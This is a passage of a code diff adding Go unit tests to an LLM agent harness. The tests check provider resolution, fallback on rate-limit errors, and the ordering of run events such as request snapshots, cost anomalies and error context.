+	// Neither provider should have been called (run failed at resolution).
+	require.Equal(t, 0, defaultProvider.Calls())
+	require.Equal(t, 0, registryProvider.Calls())
+}
+
+// TestResolution_Consistency verifies that resolveProviderCandidates index 0
+// matches resolveProvider for the same inputs. Tests three cases:
+// (a) preferred set + available
+// (b) preferred unavailable + fallback enabled
+// (c) no preferred provider
+func TestResolution_Consistency(t *testing.T) {
+	t.Parallel()
+
+	defaultProvider := &resolutionTestProvider{}
+	registryProvider := &resolutionTestProvider{}
+
+	cat := &catalog.Catalog{
+		CatalogVersion: "1.0",
+		Providers: map[string]catalog.ProviderEntry{
+			"registry-provider": {
+				DisplayName: "registry-provider",
+				BaseURL:     "https://api.example.com",
+				APIKeyEnv:   "TEST_API_KEY",
+				Protocol:    "openai",
+				Models: map[string]catalog.Model{
+					"test-model": {
+						DisplayName:   "test-model",
+						ContextWindow: 128000,
+						ToolCalling:   true,
+						Streaming:     true,
+					},
+				},
+			},
+		},
+	}
+
+	reg := catalog.NewProviderRegistryWithEnv(cat, func(key string) string {
+		if key == "TEST_API_KEY" {
+			return "sk-test-fake"
+		}
+		return ""
+	})
+
+	reg.SetClientFactory(func(_, _, providerName string) (catalog.ProviderClient, error) {
+		if providerName == "registry-provider" {
+			return registryProvider, nil
+		}
+		return nil, nil
+	})
+
+	runner := NewRunner(defaultProvider, NewRegistry(), RunnerConfig{
+		DefaultModel:     "test-model",
+		MaxSteps:         2,
+		ProviderRegistry: reg,
+	})
+
+	// Case (a): preferred provider set and available
+	t.Run("preferred_available", func(t *testing.T) {
+		p, name, err := runner.resolveProvider("test-run-a", "test-model", "registry-provider", true)
+		require.NoError(t, err)
+		require.Equal(t, "registry-provider", name)
+		require.Equal(t, registryProvider, p)
+
+		// resolveProviderCandidates should have the same provider at index 0
+		candidates, err := runner.resolveProviderCandidates("test-run-a", "test-model", "registry-provider", true, nil)
+		require.NoError(t, err)
+		require.NotEmpty(t, candidates)
+		require.Equal(t, name, candidates[0].Name)
+		require.Equal(t, p, candidates[0].Provider)
+	})
+
+	// Case (b): preferred unavailable but fallback enabled
+	// To test fallback to default, we need a model that doesn't exist in registry
+	t.Run("preferred_unavailable_fallback", func(t *testing.T) {
+		p, name, err := runner.resolveProvider("test-run-b", "nonexistent-model", "nonexistent", true)
+		require.NoError(t, err)
+		require.Equal(t, "default", name)
+		require.Equal(t, defaultProvider, p)
+
+		// resolveProviderCandidates should have the same provider at index 0
+		candidates, err := runner.resolveProviderCandidates("test-run-b", "nonexistent-model", "nonexistent", true, nil)
+		require.NoError(t, err)
+		require.NotEmpty(t, candidates)
+		require.Equal(t, name, candidates[0].Name)
+		require.Equal(t, p, candidates[0].Provider)
+	})
+
+	// Case (c): no preferred provider specified
+	t.Run("no_preferred", func(t *testing.T) {
+		p, name, err := runner.resolveProvider("test-run-c", "test-model", "", true)
+		require.NoError(t, err)
+		require.Equal(t, "registry-provider", name)
+		require.Equal(t, registryProvider, p)
+
+		// resolveProviderCandidates should have the same provider at index 0
+		candidates, err := runner.resolveProviderCandidates("test-run-c", "test-model", "", true, nil)
+		require.NoError(t, err)
+		require.NotEmpty(t, candidates)
+		require.Equal(t, name, candidates[0].Name)
+		require.Equal(t, p, candidates[0].Provider)
+	})
+}

--- a/internal/harness/runner_fallback_test.go
+++ b/internal/harness/runner_fallback_test.go
@@ -1,0 +1,323 @@
+package harness
+
+// Fallback tests for the runtime provider fallback mechanism.
+//
+// NOTE: We cannot import fakeprovider here because that package imports
+// harness, which would create an import cycle (harness ← fakeprovider ← harness).
+// Instead, we define minimal inline stubs that replicate the behaviour needed
+// for these specific test scenarios.
+
+import (
+	"context"
+	"sync"
+	"testing"
+
+	"go-agent-harness/internal/provider/catalog"
+
+	"github.com/stretchr/testify/require"
+)
+
+// scriptedFallbackProvider is a minimal harness.Provider stub that serves a
+// fixed sequence of (result, error) pairs.  It counts calls and satisfies
+// catalog.ProviderClient (interface{}).
+type scriptedFallbackProvider struct {
+	mu    sync.Mutex
+	turns []fallbackTurn
+	idx   int
+}
+
+type fallbackTurn struct {
+	content string
+	deltas  []CompletionDelta // emitted via req.Stream before returning
+	err     error
+}
+
+func (p *scriptedFallbackProvider) Complete(_ context.Context, req CompletionRequest) (CompletionResult, error) {
+	p.mu.Lock()
+	i := p.idx
+	if i < len(p.turns) {
+		p.idx++
+	}
+	p.mu.Unlock()
+
+	if i >= len(p.turns) {
+		return CompletionResult{}, nil
+	}
+	turn := p.turns[i]
+
+	// Emit deltas before returning.
+	if req.Stream != nil {
+		for _, d := range turn.deltas {
+			req.Stream(d)
+		}
+	}
+
+	if turn.err != nil {
+		return CompletionResult{}, turn.err
+	}
+	return CompletionResult{Content: turn.content}, nil
+}
+
+func (p *scriptedFallbackProvider) Calls() int {
+	p.mu.Lock()
+	defer p.mu.Unlock()
+	return p.idx
+}
+
+// newFallbackTwoProviderRegistry builds a ProviderRegistry with two named
+// providers ("primary" and "secondary") each backed by the given stubs.
+func newFallbackTwoProviderRegistry(
+	primaryStub, secondaryStub *scriptedFallbackProvider,
+) *catalog.ProviderRegistry {
+	cat := &catalog.Catalog{
+		CatalogVersion: "1.0",
+		Providers: map[string]catalog.ProviderEntry{
+			"primary": {
+				DisplayName: "primary",
+				BaseURL:     "https://api.primary.example.com",
+				APIKeyEnv:   "PRIMARY_API_KEY",
+				Protocol:    "openai",
+				Models: map[string]catalog.Model{
+					"primary-model": {
+						DisplayName:   "primary-model",
+						ContextWindow: 128000,
+						ToolCalling:   true,
+						Streaming:     true,
+					},
+				},
+			},
+			"secondary": {
+				DisplayName: "secondary",
+				BaseURL:     "https://api.secondary.example.com",
+				APIKeyEnv:   "SECONDARY_API_KEY",
+				Protocol:    "openai",
+				Models: map[string]catalog.Model{
+					"secondary-model": {
+						DisplayName:   "secondary-model",
+						ContextWindow: 128000,
+						ToolCalling:   true,
+						Streaming:     true,
+					},
+				},
+			},
+		},
+	}
+
+	reg := catalog.NewProviderRegistryWithEnv(cat, func(key string) string {
+		switch key {
+		case "PRIMARY_API_KEY":
+			return "sk-primary-fake"
+		case "SECONDARY_API_KEY":
+			return "sk-secondary-fake"
+		}
+		return ""
+	})
+
+	reg.SetClientFactory(func(_, _, providerName string) (catalog.ProviderClient, error) {
+		switch providerName {
+		case "primary":
+			return primaryStub, nil
+		case "secondary":
+			return secondaryStub, nil
+		}
+		return nil, nil
+	})
+
+	return reg
+}
+
+// TestFallback_PrimaryRateLimited_SecondarySucceeds verifies case (1):
+// primary returns 429, AllowFallback=true, FallbackProviders=["secondary"] →
+// prompt.warning code=provider_fallback emitted, then run.completed (NOT
+// run.failed); primary.Calls()==1, secondary.Calls()==1.
+func TestFallback_PrimaryRateLimited_SecondarySucceeds(t *testing.T) {
+	t.Parallel()
+
+	primaryStub := &scriptedFallbackProvider{turns: []fallbackTurn{
+		{err: &ProviderHTTPError{Provider: "primary", StatusCode: 429, Body: "rate limited"}},
+	}}
+	secondaryStub := &scriptedFallbackProvider{turns: []fallbackTurn{
+		{content: "secondary response"},
+	}}
+
+	reg := newFallbackTwoProviderRegistry(primaryStub, secondaryStub)
+
+	runner := NewRunner(primaryStub, NewRegistry(), RunnerConfig{
+		DefaultModel:     "primary-model",
+		MaxSteps:         2,
+		ProviderRegistry: reg,
+	})
+
+	run, err := runner.StartRun(RunRequest{
+		Prompt:            "hello",
+		Model:             "primary-model",
+		ProviderName:      "primary",
+		AllowFallback:     true,
+		FallbackProviders: []string{"secondary"},
+	})
+	require.NoError(t, err)
+
+	events, err := collectRunEvents(t, runner, run.ID)
+	require.NoError(t, err)
+
+	// Run must complete (not fail).
+	state, ok := runner.GetRun(run.ID)
+	require.True(t, ok)
+	require.Equal(t, RunStatusCompleted, state.Status, "run must complete when fallback succeeds; got events: %v", eventTypes(events))
+	require.Equal(t, "secondary response", state.Output)
+
+	// A prompt.warning with code=provider_fallback must appear.
+	var foundFallbackWarning bool
+	for _, ev := range events {
+		if ev.Type == EventPromptWarning {
+			if code, _ := ev.Payload["code"].(string); code == "provider_fallback" {
+				foundFallbackWarning = true
+			}
+		}
+	}
+	require.True(t, foundFallbackWarning,
+		"expected prompt.warning with code=provider_fallback; got events: %v", eventTypes(events))
+
+	// provider_fallback warning must appear before run.completed.
+	requireEventOrder(t, events, "prompt.warning", "run.completed")
+
+	// Each provider called exactly once.
+	require.Equal(t, 1, primaryStub.Calls(), "primary must be called exactly once")
+	require.Equal(t, 1, secondaryStub.Calls(), "secondary must be called exactly once")
+}
+
+// TestFallback_AllowFallbackFalse_RunFails verifies case (2):
+// AllowFallback=false → run.failed; secondary never called.
+func TestFallback_AllowFallbackFalse_RunFails(t *testing.T) {
+	t.Parallel()
+
+	primaryStub := &scriptedFallbackProvider{turns: []fallbackTurn{
+		{err: &ProviderHTTPError{Provider: "primary", StatusCode: 429, Body: "rate limited"}},
+	}}
+	secondaryStub := &scriptedFallbackProvider{turns: []fallbackTurn{
+		{content: "secondary response"},
+	}}
+
+	reg := newFallbackTwoProviderRegistry(primaryStub, secondaryStub)
+
+	runner := NewRunner(primaryStub, NewRegistry(), RunnerConfig{
+		DefaultModel:     "primary-model",
+		MaxSteps:         2,
+		ProviderRegistry: reg,
+	})
+
+	run, err := runner.StartRun(RunRequest{
+		Prompt:            "hello",
+		Model:             "primary-model",
+		ProviderName:      "primary",
+		AllowFallback:     false,
+		FallbackProviders: []string{"secondary"},
+	})
+	require.NoError(t, err)
+
+	events, err := collectRunEvents(t, runner, run.ID)
+	require.NoError(t, err)
+
+	state, ok := runner.GetRun(run.ID)
+	require.True(t, ok)
+	require.Equal(t, RunStatusFailed, state.Status,
+		"run must fail when AllowFallback=false; got events: %v", eventTypes(events))
+
+	requireEventOrder(t, events, "run.failed")
+
+	// Secondary must never be called.
+	require.Equal(t, 0, secondaryStub.Calls(),
+		"secondary must NOT be called when AllowFallback=false")
+}
+
+// TestFallback_MidStream_NoFallback verifies case (3):
+// Primary emits a delta then errors → NO fallback (streaming-safety rule); run.failed.
+func TestFallback_MidStream_NoFallback(t *testing.T) {
+	t.Parallel()
+
+	// Primary emits a content delta then returns a retryable error.
+	primaryStub := &scriptedFallbackProvider{turns: []fallbackTurn{
+		{
+			deltas: []CompletionDelta{{Content: "partial content"}},
+			err:    &ProviderHTTPError{Provider: "primary", StatusCode: 429, Body: "rate limited mid-stream"},
+		},
+	}}
+	secondaryStub := &scriptedFallbackProvider{turns: []fallbackTurn{
+		{content: "secondary response"},
+	}}
+
+	reg := newFallbackTwoProviderRegistry(primaryStub, secondaryStub)
+
+	runner := NewRunner(primaryStub, NewRegistry(), RunnerConfig{
+		DefaultModel:     "primary-model",
+		MaxSteps:         2,
+		ProviderRegistry: reg,
+	})
+
+	run, err := runner.StartRun(RunRequest{
+		Prompt:            "hello",
+		Model:             "primary-model",
+		ProviderName:      "primary",
+		AllowFallback:     true,
+		FallbackProviders: []string{"secondary"},
+	})
+	require.NoError(t, err)
+
+	events, err := collectRunEvents(t, runner, run.ID)
+	require.NoError(t, err)
+
+	state, ok := runner.GetRun(run.ID)
+	require.True(t, ok)
+	require.Equal(t, RunStatusFailed, state.Status,
+		"run must fail when primary emits a delta before the error (streaming-safety); got events: %v", eventTypes(events))
+
+	requireEventOrder(t, events, "run.failed")
+
+	// Secondary must NOT be called.
+	require.Equal(t, 0, secondaryStub.Calls(),
+		"secondary must NOT be called when primary already emitted a streaming delta")
+}
+
+// TestFallback_NonEligibleStatus_NoFallback verifies case (4):
+// Non-eligible status 400 + AllowFallback=true → run.failed (not masked).
+func TestFallback_NonEligibleStatus_NoFallback(t *testing.T) {
+	t.Parallel()
+
+	primaryStub := &scriptedFallbackProvider{turns: []fallbackTurn{
+		{err: &ProviderHTTPError{Provider: "primary", StatusCode: 400, Body: "bad request"}},
+	}}
+	secondaryStub := &scriptedFallbackProvider{turns: []fallbackTurn{
+		{content: "secondary response"},
+	}}
+
+	reg := newFallbackTwoProviderRegistry(primaryStub, secondaryStub)
+
+	runner := NewRunner(primaryStub, NewRegistry(), RunnerConfig{
+		DefaultModel:     "primary-model",
+		MaxSteps:         2,
+		ProviderRegistry: reg,
+	})
+
+	run, err := runner.StartRun(RunRequest{
+		Prompt:            "hello",
+		Model:             "primary-model",
+		ProviderName:      "primary",
+		AllowFallback:     true,
+		FallbackProviders: []string{"secondary"},
+	})
+	require.NoError(t, err)
+
+	events, err := collectRunEvents(t, runner, run.ID)
+	require.NoError(t, err)
+
+	state, ok := runner.GetRun(run.ID)
+	require.True(t, ok)
+	require.Equal(t, RunStatusFailed, state.Status,
+		"run must fail for non-eligible status 400 even with AllowFallback=true; got events: %v", eventTypes(events))
+
+	requireEventOrder(t, events, "run.failed")
+
+	// Secondary must NOT be called.
+	require.Equal(t, 0, secondaryStub.Calls(),
+		"secondary must NOT be called for non-eligible status 400")
+}

--- a/internal/harness/runner_forensics_ordering_test.go
+++ b/internal/harness/runner_forensics_ordering_test.go
@@ -1,0 +1,530 @@
+package harness
+
+import (
+	"context"
+	"encoding/json"
+	"errors"
+	"testing"
+)
+
+// --------------------------------------------------------------------------
+// T-A2: llm.request.snapshot BEFORE provider.Complete, llm.response.meta AFTER
+//
+// The runner emits EventLLMRequestSnapshot immediately before calling
+// candidate.Provider.Complete, then emits EventLLMResponseMeta immediately
+// after the call returns (runner_step_engine.go lines ~371/468). Both must
+// appear in the event stream with the expected ordering relative to
+// llm.turn.completed and each other.
+// --------------------------------------------------------------------------
+
+// TestRequestSnapshotBeforeProviderComplete_OrderingRelativeToTurn verifies:
+//
+//	llm.request.snapshot < llm.turn.completed  (snapshot is PRE-call)
+//	llm.response.meta    < llm.turn.completed  would fail — response.meta is
+//	                                            actually emitted BEFORE turn.completed.
+//
+// Full ordering: llm.request.snapshot → (provider.Complete) → llm.response.meta
+//
+//	→ usage.delta → llm.turn.completed
+func TestRequestSnapshotBeforeProviderComplete_OrderingRelativeToTurn(t *testing.T) {
+	t.Parallel()
+
+	prov := &stubProvider{turns: []CompletionResult{
+		{Content: "done", ModelVersion: "test-v1"},
+	}}
+	runner := NewRunner(prov, NewRegistry(), RunnerConfig{
+		DefaultModel:           "test-model",
+		MaxSteps:               2,
+		CaptureRequestEnvelope: true,
+	})
+
+	run, err := runner.StartRun(RunRequest{Prompt: "ordering test"})
+	if err != nil {
+		t.Fatalf("StartRun: %v", err)
+	}
+	waitForStatus(t, runner, run.ID, RunStatusCompleted, RunStatusFailed)
+
+	events, err := collectRunEvents(t, runner, run.ID)
+	if err != nil {
+		t.Fatalf("collectRunEvents: %v", err)
+	}
+
+	// requireEventOrder asserts strict left-to-right ordering on first occurrence.
+	requireEventOrder(t, events,
+		string(EventLLMRequestSnapshot), // PRE-call: before provider.Complete
+		string(EventLLMResponseMeta),    // POST-call: after provider.Complete returns
+		string(EventLLMTurnCompleted),   // after usage.delta + response meta
+	)
+}
+
+// TestRequestSnapshotBeforeResponseMeta_MultiStep verifies the per-step ordering
+// for a multi-turn run: each step must have its snapshot before its meta.
+// For the FIRST occurrence this is equivalent to requireEventOrder, but we also
+// check the second step explicitly by index.
+func TestRequestSnapshotBeforeResponseMeta_MultiStep(t *testing.T) {
+	t.Parallel()
+
+	registry := NewRegistry()
+	_ = registry.Register(ToolDefinition{
+		Name:        "noop_ord",
+		Description: "does nothing",
+		Parameters:  map[string]any{"type": "object", "properties": map[string]any{}},
+	}, func(_ context.Context, _ json.RawMessage) (string, error) {
+		return "ok", nil
+	})
+
+	prov := &stubProvider{turns: []CompletionResult{
+		{ToolCalls: []ToolCall{{ID: "c1", Name: "noop_ord", Arguments: `{}`}}},
+		{Content: "done"},
+	}}
+	runner := NewRunner(prov, registry, RunnerConfig{
+		DefaultModel:           "test-model",
+		MaxSteps:               5,
+		CaptureRequestEnvelope: true,
+	})
+
+	run, err := runner.StartRun(RunRequest{Prompt: "multi-step ordering"})
+	if err != nil {
+		t.Fatalf("StartRun: %v", err)
+	}
+	waitForStatus(t, runner, run.ID, RunStatusCompleted, RunStatusFailed)
+
+	events, err := collectRunEvents(t, runner, run.ID)
+	if err != nil {
+		t.Fatalf("collectRunEvents: %v", err)
+	}
+
+	// Collect all snapshots and metas in order.
+	var snapshots, metas []int
+	for i, ev := range events {
+		switch ev.Type {
+		case EventLLMRequestSnapshot:
+			snapshots = append(snapshots, i)
+		case EventLLMResponseMeta:
+			metas = append(metas, i)
+		}
+	}
+
+	if len(snapshots) != 2 {
+		t.Fatalf("expected 2 llm.request.snapshot events, got %d", len(snapshots))
+	}
+	if len(metas) != 2 {
+		t.Fatalf("expected 2 llm.response.meta events, got %d", len(metas))
+	}
+
+	// Step 1: snapshot[0] < meta[0].
+	if snapshots[0] >= metas[0] {
+		t.Errorf("step 1: llm.request.snapshot (idx %d) must precede llm.response.meta (idx %d)",
+			snapshots[0], metas[0])
+	}
+	// Step 2: snapshot[1] < meta[1].
+	if snapshots[1] >= metas[1] {
+		t.Errorf("step 2: llm.request.snapshot (idx %d) must precede llm.response.meta (idx %d)",
+			snapshots[1], metas[1])
+	}
+	// Step 1 snapshot before step 2 snapshot (monotonic).
+	if snapshots[0] >= snapshots[1] {
+		t.Errorf("snapshot[0] (idx %d) should come before snapshot[1] (idx %d)",
+			snapshots[0], snapshots[1])
+	}
+}
+
+// --------------------------------------------------------------------------
+// T-A3: per-step ordering for context.window.snapshot and cost.anomaly
+//
+// After each LLM turn the runner emits (in this order):
+//
+//	usage.delta → llm.turn.completed → cost.anomaly (if triggered) → context.window.snapshot
+//
+// T-A3a: ContextWindowSnapshotEnabled — snapshot appears AFTER llm.turn.completed.
+// T-A3b: CostAnomalyDetectionEnabled — anomaly appears AFTER llm.turn.completed.
+// T-A3c: Both enabled simultaneously — cost.anomaly < context.window.snapshot.
+// --------------------------------------------------------------------------
+
+// TestContextWindowSnapshotAfterTurnCompleted verifies that when
+// ContextWindowSnapshotEnabled is true, the context.window.snapshot event is
+// emitted AFTER llm.turn.completed in the event stream (T-A3a).
+func TestContextWindowSnapshotAfterTurnCompleted(t *testing.T) {
+	t.Parallel()
+
+	prov := &stubProvider{turns: []CompletionResult{
+		{Content: "done"},
+	}}
+	runner := NewRunner(prov, NewRegistry(), RunnerConfig{
+		DefaultModel:                 "test-model",
+		MaxSteps:                     2,
+		ContextWindowSnapshotEnabled: true,
+	})
+
+	run, err := runner.StartRun(RunRequest{Prompt: "context window ordering"})
+	if err != nil {
+		t.Fatalf("StartRun: %v", err)
+	}
+	waitForStatus(t, runner, run.ID, RunStatusCompleted, RunStatusFailed)
+
+	events, err := collectRunEvents(t, runner, run.ID)
+	if err != nil {
+		t.Fatalf("collectRunEvents: %v", err)
+	}
+
+	requireEventOrder(t, events,
+		string(EventLLMTurnCompleted),
+		string(EventContextWindowSnapshot),
+	)
+}
+
+// TestCostAnomalyAfterTurnCompleted verifies that when
+// CostAnomalyDetectionEnabled is true and a step triggers an anomaly, the
+// cost.anomaly event is emitted AFTER llm.turn.completed (T-A3b).
+func TestCostAnomalyAfterTurnCompleted(t *testing.T) {
+	t.Parallel()
+
+	registry := NewRegistry()
+	_ = registry.Register(ToolDefinition{
+		Name:        "noop_ca_ord",
+		Description: "does nothing",
+		Parameters:  map[string]any{"type": "object", "properties": map[string]any{}},
+	}, func(_ context.Context, _ json.RawMessage) (string, error) {
+		return "ok", nil
+	})
+
+	// Step 1: baseline $0.01; Step 2: spike $0.50 (50× > 2× threshold).
+	prov := &stubProvider{turns: []CompletionResult{
+		{
+			ToolCalls:  []ToolCall{{ID: "c1", Name: "noop_ca_ord", Arguments: `{}`}},
+			Cost:       &CompletionCost{TotalUSD: 0.01},
+			CostStatus: CostStatusAvailable,
+		},
+		{
+			Content:    "done",
+			Cost:       &CompletionCost{TotalUSD: 0.50},
+			CostStatus: CostStatusAvailable,
+		},
+	}}
+	runner := NewRunner(prov, registry, RunnerConfig{
+		DefaultModel:                "test-model",
+		MaxSteps:                    5,
+		CostAnomalyDetectionEnabled: true,
+		CostAnomalyStepMultiplier:   2.0,
+	})
+
+	run, err := runner.StartRun(RunRequest{Prompt: "cost anomaly ordering"})
+	if err != nil {
+		t.Fatalf("StartRun: %v", err)
+	}
+	waitForStatus(t, runner, run.ID, RunStatusCompleted, RunStatusFailed)
+
+	events, err := collectRunEvents(t, runner, run.ID)
+	if err != nil {
+		t.Fatalf("collectRunEvents: %v", err)
+	}
+
+	// Confirm anomaly is present so the ordering assertion is meaningful.
+	var sawAnomaly bool
+	for _, ev := range events {
+		if ev.Type == EventCostAnomaly {
+			sawAnomaly = true
+			break
+		}
+	}
+	if !sawAnomaly {
+		t.Fatal("expected at least one cost.anomaly event (prerequisite for ordering assertion)")
+	}
+
+	requireEventOrder(t, events,
+		string(EventLLMTurnCompleted),
+		string(EventCostAnomaly),
+	)
+}
+
+// TestCostAnomalyBeforeContextWindowSnapshot verifies that when both
+// CostAnomalyDetectionEnabled and ContextWindowSnapshotEnabled are enabled, a
+// cost.anomaly event (when triggered) appears BEFORE context.window.snapshot in
+// the same step (T-A3c).
+//
+// Note: requireEventOrder uses first occurrence, so we must assert on the step
+// where BOTH events co-occur (the anomaly step). We do this by collecting all
+// indices and checking relative ordering within the anomaly step specifically.
+func TestCostAnomalyBeforeContextWindowSnapshot(t *testing.T) {
+	t.Parallel()
+
+	registry := NewRegistry()
+	_ = registry.Register(ToolDefinition{
+		Name:        "noop_both_ord",
+		Description: "does nothing",
+		Parameters:  map[string]any{"type": "object", "properties": map[string]any{}},
+	}, func(_ context.Context, _ json.RawMessage) (string, error) {
+		return "ok", nil
+	})
+
+	prov := &stubProvider{turns: []CompletionResult{
+		{
+			ToolCalls:  []ToolCall{{ID: "c1", Name: "noop_both_ord", Arguments: `{}`}},
+			Cost:       &CompletionCost{TotalUSD: 0.01},
+			CostStatus: CostStatusAvailable,
+		},
+		{
+			Content:    "done",
+			Cost:       &CompletionCost{TotalUSD: 0.50},
+			CostStatus: CostStatusAvailable,
+		},
+	}}
+	runner := NewRunner(prov, registry, RunnerConfig{
+		DefaultModel:                 "test-model",
+		MaxSteps:                     5,
+		CostAnomalyDetectionEnabled:  true,
+		CostAnomalyStepMultiplier:    2.0,
+		ContextWindowSnapshotEnabled: true,
+	})
+
+	run, err := runner.StartRun(RunRequest{Prompt: "cost anomaly + context window ordering"})
+	if err != nil {
+		t.Fatalf("StartRun: %v", err)
+	}
+	waitForStatus(t, runner, run.ID, RunStatusCompleted, RunStatusFailed)
+
+	events, err := collectRunEvents(t, runner, run.ID)
+	if err != nil {
+		t.Fatalf("collectRunEvents: %v", err)
+	}
+
+	// Collect all positions for cost.anomaly and context.window.snapshot.
+	var anomalyIdxs, windowIdxs []int
+	for i, ev := range events {
+		switch ev.Type {
+		case EventCostAnomaly:
+			anomalyIdxs = append(anomalyIdxs, i)
+		case EventContextWindowSnapshot:
+			windowIdxs = append(windowIdxs, i)
+		}
+	}
+	if len(anomalyIdxs) == 0 {
+		t.Fatal("expected at least one cost.anomaly event (prerequisite for ordering assertion)")
+	}
+	if len(windowIdxs) == 0 {
+		t.Fatal("expected at least one context.window.snapshot event (prerequisite for ordering assertion)")
+	}
+
+	// The step that triggers an anomaly (step 2) should produce both a
+	// cost.anomaly and a context.window.snapshot. Find the context.window.snapshot
+	// that follows the LAST cost.anomaly (which is always in the anomaly step).
+	lastAnomalyIdx := anomalyIdxs[len(anomalyIdxs)-1]
+
+	// Find the first context.window.snapshot that appears AFTER the last anomaly.
+	nextWindowIdx := -1
+	for _, wi := range windowIdxs {
+		if wi > lastAnomalyIdx {
+			nextWindowIdx = wi
+			break
+		}
+	}
+	if nextWindowIdx < 0 {
+		t.Fatalf("expected a context.window.snapshot event after cost.anomaly (idx %d); "+
+			"snapshot indices: %v, events: %v", lastAnomalyIdx, windowIdxs, eventTypes(events))
+	}
+
+	// Confirm cost.anomaly < context.window.snapshot within the same step.
+	if lastAnomalyIdx >= nextWindowIdx {
+		t.Errorf("cost.anomaly (idx %d) should come BEFORE context.window.snapshot (idx %d) in the same step",
+			lastAnomalyIdx, nextWindowIdx)
+	}
+}
+
+// --------------------------------------------------------------------------
+// T-A4: error.context is the immediately-preceding event before run.failed
+// on the provider-error (failRun) path, AND is ABSENT on
+// failRunMaxSteps / failRunMaxTurns.
+//
+// This locks in the actual terminal asymmetry described in the plan:
+//   - failRun (provider error): ErrorChainEnabled=true → error.context emitted,
+//     immediately before run.failed.
+//   - failRunMaxSteps (max steps): error.context is NEVER emitted, even when
+//     ErrorChainEnabled=true.
+//   - failRunMaxTurns (max turns): same absence as failRunMaxSteps.
+// --------------------------------------------------------------------------
+
+// TestErrorContextImmediatelyPrecedesRunFailed verifies that when
+// ErrorChainEnabled=true and the run fails via the generic failRun path
+// (provider returns an error), error.context is the immediately-preceding
+// event before run.failed (T-A4a).
+func TestErrorContextImmediatelyPrecedesRunFailed(t *testing.T) {
+	t.Parallel()
+
+	prov := &errorProvider{err: errors.New("simulated provider failure")}
+	runner := NewRunner(prov, NewRegistry(), RunnerConfig{
+		DefaultModel:      "test-model",
+		MaxSteps:          10,
+		ErrorChainEnabled: true,
+	})
+
+	run, err := runner.StartRun(RunRequest{Prompt: "trigger provider error"})
+	if err != nil {
+		t.Fatalf("StartRun: %v", err)
+	}
+	waitForStatus(t, runner, run.ID, RunStatusFailed)
+
+	events, err := collectRunEvents(t, runner, run.ID)
+	if err != nil {
+		t.Fatalf("collectRunEvents: %v", err)
+	}
+
+	// Locate error.context and run.failed by index.
+	ecIdx := -1
+	rfIdx := -1
+	for i, ev := range events {
+		switch ev.Type {
+		case EventErrorContext:
+			ecIdx = i // track last occurrence (should be exactly one)
+		case EventRunFailed:
+			rfIdx = i
+		}
+	}
+
+	if ecIdx < 0 {
+		t.Fatalf("error.context event not found on failRun path; events: %v", eventTypes(events))
+	}
+	if rfIdx < 0 {
+		t.Fatalf("run.failed event not found; events: %v", eventTypes(events))
+	}
+
+	// error.context must precede run.failed.
+	if ecIdx >= rfIdx {
+		t.Errorf("error.context (idx %d) must come BEFORE run.failed (idx %d)",
+			ecIdx, rfIdx)
+	}
+
+	// error.context must be the IMMEDIATELY preceding event before run.failed:
+	// no other event should appear between them.
+	if rfIdx-ecIdx != 1 {
+		between := eventTypes(events[ecIdx+1 : rfIdx])
+		t.Errorf("error.context should immediately precede run.failed, but %d events intervene: %v",
+			rfIdx-ecIdx-1, between)
+	}
+}
+
+// TestErrorContextAbsentOnMaxStepsPath verifies the terminal asymmetry:
+// when a run fails via failRunMaxSteps (MaxSteps exhausted), error.context is
+// NOT emitted, even when ErrorChainEnabled=true (T-A4b — locking in actual
+// behavior).
+func TestErrorContextAbsentOnMaxStepsPath(t *testing.T) {
+	t.Parallel()
+
+	// The provider always wants a tool call so the loop never self-terminates.
+	// MaxSteps=2 exhausts after two iterations, triggering failRunMaxSteps.
+	registry := NewRegistry()
+	_ = registry.Register(ToolDefinition{
+		Name:        "noop_maxsteps",
+		Description: "does nothing",
+		Parameters:  map[string]any{"type": "object", "properties": map[string]any{}},
+	}, func(_ context.Context, _ json.RawMessage) (string, error) {
+		return "ok", nil
+	})
+	prov := &stubProvider{turns: []CompletionResult{
+		{ToolCalls: []ToolCall{{ID: "c1", Name: "noop_maxsteps", Arguments: `{}`}}},
+		{ToolCalls: []ToolCall{{ID: "c2", Name: "noop_maxsteps", Arguments: `{}`}}},
+		{ToolCalls: []ToolCall{{ID: "c3", Name: "noop_maxsteps", Arguments: `{}`}}},
+	}}
+	runner := NewRunner(prov, registry, RunnerConfig{
+		DefaultModel:      "test-model",
+		MaxSteps:          2,
+		ErrorChainEnabled: true,
+	})
+
+	run, err := runner.StartRun(RunRequest{Prompt: "max steps test"})
+	if err != nil {
+		t.Fatalf("StartRun: %v", err)
+	}
+	waitForStatus(t, runner, run.ID, RunStatusFailed)
+
+	events, err := collectRunEvents(t, runner, run.ID)
+	if err != nil {
+		t.Fatalf("collectRunEvents: %v", err)
+	}
+
+	// Confirm it really was a max-steps failure.
+	var rfPayload map[string]any
+	for _, ev := range events {
+		if ev.Type == EventRunFailed {
+			rfPayload = ev.Payload
+			break
+		}
+	}
+	if rfPayload == nil {
+		t.Fatalf("no run.failed event on max-steps path; events: %v", eventTypes(events))
+	}
+	if rfPayload["reason"] != "max_steps_reached" {
+		t.Skipf("run didn't fail via max-steps path (reason=%v); skipping asymmetry assertion", rfPayload["reason"])
+	}
+
+	// ASSERT: error.context is ABSENT on the failRunMaxSteps path.
+	for _, ev := range events {
+		if ev.Type == EventErrorContext {
+			t.Errorf("error.context must be ABSENT on failRunMaxSteps path (terminal asymmetry), "+
+				"but found one; events: %v", eventTypes(events))
+		}
+	}
+}
+
+// TestErrorContextAbsentOnMaxTurnsPath verifies the terminal asymmetry:
+// when a run fails via failRunMaxTurns (MaxTurns exhausted), error.context is
+// NOT emitted, even when ErrorChainEnabled=true (T-A4c — locking in actual
+// behavior).
+func TestErrorContextAbsentOnMaxTurnsPath(t *testing.T) {
+	t.Parallel()
+
+	registry := NewRegistry()
+	_ = registry.Register(ToolDefinition{
+		Name:        "noop_maxturns",
+		Description: "does nothing",
+		Parameters:  map[string]any{"type": "object", "properties": map[string]any{}},
+	}, func(_ context.Context, _ json.RawMessage) (string, error) {
+		return "ok", nil
+	})
+
+	// The provider always returns a tool call so the loop never self-terminates.
+	// MaxTurns=1 means after the first LLM turn the run exhausts its turn budget.
+	prov := &stubProvider{turns: []CompletionResult{
+		{ToolCalls: []ToolCall{{ID: "c1", Name: "noop_maxturns", Arguments: `{}`}}},
+		{ToolCalls: []ToolCall{{ID: "c2", Name: "noop_maxturns", Arguments: `{}`}}},
+	}}
+	runner := NewRunner(prov, registry, RunnerConfig{
+		DefaultModel:      "test-model",
+		MaxSteps:          10,
+		MaxTurns:          1, // exhaust after exactly one assistant turn
